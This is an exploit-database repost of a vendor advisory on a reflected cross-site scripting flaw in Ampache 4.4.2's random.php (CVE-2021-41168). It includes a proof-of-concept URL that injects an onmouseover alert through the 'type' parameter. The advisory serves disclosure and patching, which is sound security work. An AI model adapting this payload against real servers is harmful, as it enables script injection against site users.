Advertisement






Ampache 4.4.2 Cross Site Scripting

CVE Category Price Severity
CVE-2021-41168 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2021-07-21
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N 0.025 0.49774

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021070130

Below is a copy:

Ampache 4.4.2 Cross Site Scripting
Information
--------------------
Advisory by Netsparker
Name: Cross-site Scripting vulnerability in Ampache 4.4.2
Affected Software: Ampache
Affected Versions: 4.4.2
Homepage: http://ampache.org/
Vulnerability: Cross-Site Scripting
Severity: High
Status: Fixed
CVSS Score (3.0): 7.4 (High)
Netsparker Advisory Reference: NS-21-003

Technical Details
--------------------

Cross-site scripting in Random.php

URL:
http://alihost:1134/random.php?action=get_advanced&type=%27%22%20onmouseover%3dalert(0x0002DE)%20
Parameter Name: type
Parameter Type: GET
Attack Pattern: %27%22+ns%3dnetsparker(0x0002DE)+

For more information:
https://www.netsparker.com/web-applications-advisories/ns-21-003-cross-site-scripting-in-ampache/

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.